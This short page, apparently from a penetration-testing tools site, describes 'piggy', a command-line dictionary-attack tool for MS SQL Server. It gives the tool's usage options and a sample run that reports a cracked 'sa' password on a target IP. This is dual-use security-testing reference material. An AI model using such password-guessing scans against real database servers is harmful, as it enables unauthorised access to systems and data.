piggy

Piggy is another nice little dictionary-based attack tool for MS SQL Server.  It is command-line based and is dead easy to use and supports attacks against multiple hosts/ accounts and passwords.  Another great tool from patrik.

It is available from here.

Execution:

usage: piggy [options]

the options being:
-u <username> - Single username
-p <password> - Single password
-s <server> - Single server
-S <srvfile> - File containing ip/hostnames
-D <dicfile> - File containing passwords
-A <accounts> - File containing username;password combinations
-N - Do not check availability before scan
-v verbose - Verbose logging
 

Expected output:

C:\piggy -u sa -p password -s 200.100.100.175

Piggy v1.0.1 by patrik@cqure.net
--------------------------------
[i] Loaded 1 dictionary items
[i] Checking server availability
Started scan against DB on '200.100.100.175'
FOUND [SERVER=200.100.100.175;UID=sa;PWD=password]

As you can see from the above I only used a single password attempt against the sa account, obviously if you were to conduct a dictionary based attack you would use the -D option and supply an appropriate wordlist.